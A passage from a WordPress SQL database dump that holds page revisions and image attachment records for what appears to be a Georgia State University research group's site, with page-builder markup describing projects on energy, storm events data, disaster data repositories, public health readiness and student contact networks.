records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:41:07','2023-09-29 14:41:07','',438,'https://gsudice.dataconn.net/?p=1499',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1500,1,'2023-09-29 10:41:07','2023-09-29 14:41:07','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:41:07','2023-09-29 14:41:07','',126,'https://gsudice.dataconn.net/?p=1500',0,'revision','',0),(1505,1,'2023-09-29 10:42:13','2023-09-29 14:42:13','','Picture1','','inherit','open','closed','','picture1','','','2023-09-29 10:42:13','2023-09-29 14:42:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Picture1.jpg',0,'attachment','image/jpeg',0),(1506,1,'2023-09-29 10:42:27','2023-09-29 14:42:27','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg','cropped-Picture1.jpg','','inherit','open','closed','','cropped-picture1-jpg','','','2023-09-29 10:42:27','2023-09-29 14:42:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg',0,'attachment','image/jpeg',0),(1508,1,'2023-09-29 10:42:54','2023-09-29 14:42:54','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg','cropped-cropped-Picture1.jpg','','inherit','open','closed','','cropped-cropped-picture1-jpg','','','2023-09-29 10:42:54','2023-09-29 14:42:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Picture1.jpg',0,'attachment','image/jpeg',0),(1509,1,'2023-09-29 10:43:34','2023-09-29 14:43:34','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 